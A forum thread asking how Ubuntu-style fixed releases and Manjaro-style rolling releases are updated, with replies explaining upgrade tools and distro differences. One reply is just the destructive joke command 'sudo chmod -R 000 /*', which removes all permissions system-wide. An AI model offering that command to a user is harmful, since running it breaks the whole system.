Linux updating questions

I've used various Linux distros, but never long enough to be mid major version transition. Can someone tell me how regular versions get updated and how rolling release really works? I've checked some info online, but I'm not sure if I'm understanding it correctly.

Are regular releases also performed automatically via built-in updater or do you have to do it manually using latest ISO? And how much of a delay there is for such major updates to happen? I'm most familiar with Kubuntu/Ubuntu as an example.

I also have question about rolling releases. From what I gathered, rolling release Linux distros only have major version ISO's for fresh installs, but they just update directly via built-in updater and there really isn't ever a "big release" moment. All updates are treated as regular ones, be it securty updates, minor updates or major OS updates/redesigns. Here I'm most familiar with Manjaro if you might use it as an example.

The answer varies for each individual distribution.

Generally speaking, rolling release distributions don't have consecutive fixed releases; once you installed them, launching a normal full update will bring all your packages to the latest version available on the repositories. Installing a rolling release distro will always result in you having the latest packages available at that time.

Fixed release distributions (like Ubuntu) will generally only update your core packages (e.g. the kernel) to the latest bugfix for that version of the package. This may vary somewhat depending on the specific package (some have new versions added to the repositories after release). Upgrading to a new release typically requires a specific tool and will not automatically happen by just keeping the system up to date - in most cases it does not require reinstalling the system though. This can be desirable if you rely on specific versions of some packages or are worried that the latest versions of software might be less stable.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

All of the distros I used (Lubuntu, Mint, ZorinOS, FerenOS, etc.) have an in-built updater program that notifies you when updates are available and generally handles all of them on its own, similar to how the Win10 updater does it. In some cases, it may ask you to restart the PC to complete the installation.

Major updates (such as going from 18.04 to 20.04 in Ubuntu) vary from distro to distro. For instance, while they were still on LXDE, Lubuntu enabled you to easily update from, say 17.04 to 18.04 via the updater (in most cases), whereas once they switched to the LXQT desktop environment, they required you to download a new ISO and do a fresh install because the change was more significant.

With Linux Mint Mate, major feature updates can also be done from within the updater, but the OS explicitly warns you that this is risky and gives you the option of making snapshots/backups of the system before attempting the update. 

TLDR: It can vary a lot from distro to distro. 

Ryzen 1600x @4GHz

Asus GTX 1070 8GB @1900MHz

16 GB HyperX DDR4 @3000MHz

Asus Prime X370 Pro

Samsung 860 EVO 500GB

Noctua NH-U14S

Seasonic M12II 620W

+ four different mechanical drives.